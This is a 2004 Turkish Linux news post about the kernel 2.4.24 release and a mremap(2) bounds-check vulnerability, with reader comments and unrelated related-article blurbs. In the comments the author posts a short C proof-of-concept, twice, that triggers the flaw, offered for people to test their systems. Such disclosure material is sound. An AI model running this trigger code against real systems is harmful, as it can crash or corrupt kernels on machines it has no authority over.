Kernel 2.4.24 Çıktı

0
bahadirkandemir
bahadirkandemir
6 Ocak 2004 , 1 dakika okuma süresi
Kernel'in bellek yönetim kodunda, mremap(2) sistem çağrısındaki hatalı sınır kontrolünden kaynaklanan bir güvenlik zayıflığı bulundu.

mremap sistem çağrısı, sanal bellek alanlarının adreslenebilir boşluklarını taşımak ve boyutlarını değiştirme imkanı sağlıyor.

Duyurunun tamamı: http://isec.pl/vulnerabilities/isec-0013-mremap.txt
linux
3
Linkedin Facebook Twitter Google plus

Görüşler

bahadirkandemir
0
bahadirkandemir
NOT: Bu zayıflığın 2.2, 2.4 ver 2.6 serilerinde olduğu belirtilmişti ancak, zayıflığı keşfeden güvenlik grubu bu açığın MREMAP_FIXED bayrağını desteklemeyen 2.2 serilerinde olmadığını önemli güvenlik listelerinde duyurdu.

Kernel 2.6.0'da aynı zayıflığın olduğu duyurulmuştu, 2.6.1-rc1'de zayıflığın giderilmediği, 2.6.1-rc2'de giderildiği ek bir açıklama ile duyuruldu.

Zayıflığı test etmek isteyenler aşağıdaki kodu deneyebilir:

#include
#include
#include
#include

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}
realist
0
realist
ne #include ediyoruz?
hangi #include ?
bahadirkandemir
0
bahadirkandemir
Sanırım < ve > karakterleri sorun yarattı. 2 kere önizleme yapmamdan kaynaklandı.

----------------------------------------------

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <errno.h>

#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );

int main( void )
{
void *base;

base = mmap( NULL, 8192, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

real_mremap( base, 0, 0, MREMAP_MAYMOVE | MREMAP_FIXED,
(void *) 0xC0000000 );

fork();

return( 0 );
}
Görüş belirtmek için giriş yapın...

İlgili Yazılar

Son 2.4
yuxel
29 Kasım 2003, 1 dakika okuma süresi

Kernel 2.6'yı beklerken, 2.4.22'nin duyurulmasından 3 ay sonra 2.4.23 duyuruldu. Jens Axboe'nun yazdığı "Laptop mode" adı verilen sistem; pillerin daha uzun kullanılmasını sağlayacak. 2.4.23 deki yenilikler için şu adrese göz atabilirsiniz.
Kaynak: kerneltrap.org

Fedora Core 1.0 Hazır
caglar_onur
7 Kasım 2003, 1 dakika okuma süresi

Redhat'in açık kaynak projesi haline getirdiği Fedora Linux ilk sürümünü duyurdu.
Ayrıntılar için: http://fedora.redhat.com/
Sürüm Notları için: http://fedora.redhat.com/docs/release-notes/
İndirmek için: http://fedora.redhat.com/download/

Not: ftp.linux.org.tr'de mecvut benim bulabildiğim tek türkiye yansısı o, şu an indiriyorum akşamda vakit bulursam kuracağım, ilk izlenimlerimi aktarmaya çalışırım

Caldera, Micro$oft tarzı koltuk başına lisans sistemine geçiyor
larweda
27 Haziran 2001, 1 dakika okuma süresi

Caldera sistems, oldukça popüler olan Caldera OpenLinux Workstation paketinin bu hafta piyasaya çıkan yeni versiyonunun satışlarını Microsoft`un windows ürünlerinde yaptığı gibi koltuk başına lisanslandırma ile yapacağını açıkladı. Bu bağlamda destek istenirse bir 'koltuk'luk Caldera Openlinux Workstation 99$`a, desteksiz bir 'koltuk'luk Caldera Openlinux Workstation 59$`a satılıyor. Bu, genelde paralel kullanıcı sayısını baz alan geleneksel unix ücretlendirmesinden de tamamen farklı bir yaklaşım. Linux dağıtımı gibi hataya izin vermeyen bir piyasada bu tarz radikal bir denemenin nasıl sonuçlar vereceğini de birkaç ay içinde hep beraber göreceğiz.

Chris Stephenson röportajı
anonim
24 Mart 2004, 1 dakika okuma süresi

İstanbul Bilgi Üniversitesi - Open Source Enterprise Centre Danışmanı Chris Stephenson'la NTV Radyo'daki "Linux Magazine" programında bir röportaj yayınlanacak. 25 Mart'ta saat 12:30'da dinlenecebilecek. Programda Chris Stephenson'la özgür yazılım ve üniversiteler üzerine konuşulduğu bilgisi alındı. Röportajın dökümünün NTVMSNBC portalında yayınlanacağı da söylendi.
http://www.ntvmsnbc.com/ntv/ntvradyo adresinden canlı dinlenebilir.

İTÜ Linux Sertifika Programı
anonim
18 Temmuz 2001, 1 dakika okuma süresi

Evet, İTÜ Linux Sertifika Programı başlatmış. Ne diyeyim hayırlı olsun.

İlgilenenler için
http://wsprj.cc.itu.edu.tr/itu-lsp/index.html